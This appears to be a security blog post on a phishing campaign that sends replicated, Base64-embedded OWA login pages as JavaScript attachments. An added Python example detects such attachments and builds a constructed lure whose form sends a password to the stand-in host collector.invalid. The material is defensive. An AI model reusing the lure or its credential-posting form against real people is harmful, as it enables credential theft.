Threat landscape

Dynamic email phishing campaign – round two

What happened last time?

In January 2019 we saw attackers launching a large-scale phishing campaign with the unique ability to dynamically generate content. Unlike a generic phishing attempt, this new approach is capable of dynamically changing its content based on the targeted organisation’s email domain.

This allows the malicious actor to distribute credible-looking phishing emails widely and in far less time, improving both the quality and the quantity of the campaign and therefore its success rate.


What has changed?

Towards the end of 2021 we saw this go a step further: the target organisation’s branded OWA pages were replicated in full and saved as a JavaScript file attached to a phishing email.

All of the images were embedded as Base64 data, so the page made no external connection until the victim entered their credentials.


What can we do about it?

In reality, while this change may prove effective for the people running the campaign in some unusual circumstances, it is more likely a step backwards: most organisations block JavaScript files attached to inbound emails outright.

In addition, even with the most basic end-user training you would expect targets not to open an emailed JavaScript file, and certainly not to enter their credentials after opening one.
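The two traits described above (a script attachment, and a self-contained login page with inline Base64 images and a password field) can be checked for at the mail gateway. The following is an added example, not code from the original post; the attachment names, addresses and the `collector.invalid` form target are constructed sample data.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Attachment extensions that most mail gateways already block outright.
SCRIPT_EXTENSIONS = (".js", ".jse", ".wsf", ".hta")
# Traits of a page that works offline until credentials are submitted.
INLINE_IMAGE_RE = re.compile(rb"data:image/[a-z]+;base64,", re.IGNORECASE)
PASSWORD_FIELD_RE = re.compile(rb"type\s*=\s*['\"]?password", re.IGNORECASE)


def inspect_message(raw: bytes) -> list:
    """Return one finding per suspicious attachment in a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        body = part.get_payload(decode=True) or b""
        reasons = []
        if name.endswith(SCRIPT_EXTENSIONS):
            reasons.append("script-attachment")
        inline_images = len(INLINE_IMAGE_RE.findall(body))
        # Inline images plus a password field: a login page that needs no network
        # access to render, exactly the pattern described in the post.
        if inline_images and PASSWORD_FIELD_RE.search(body):
            reasons.append("offline-login-page")
        if reasons:
            findings.append({"filename": name, "inline_images": inline_images, "reasons": reasons})
    return findings


def build_sample() -> bytes:
    """Constructed sample: a fake OWA page saved as a .js attachment (not a real campaign artefact)."""
    page = (b"document.write('<img src=\"data:image/png;base64,iVBORw0KGgo=\">"
            b"<form action=\"https://collector.invalid/\">"
            b"<input type=\"password\" name=\"pw\"></form>');")
    msg = EmailMessage()
    msg["From"] = "it-support@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Action required: mailbox quota"
    msg.set_content("Please open the attached file to confirm your mailbox.")
    msg.add_attachment(page, maintype="application", subtype="javascript", filename="owa_login.js")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in inspect_message(build_sample()):
        print(finding)
```

The `script-attachment` reason alone justifies a block; `offline-login-page` also catches the same page saved as `.html`, which many gateways do not block.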


If this isn’t more advanced, why is it important?

It is imperative that we keep a close eye on the tactics, techniques, and procedures attackers are using to bypass security technologies, fool end users and attempt to compromise your organisation.

Recognising evolution in these TTPs allows you to adjust your policies and technologies so that you remain up to date and protected against the latest attack trends.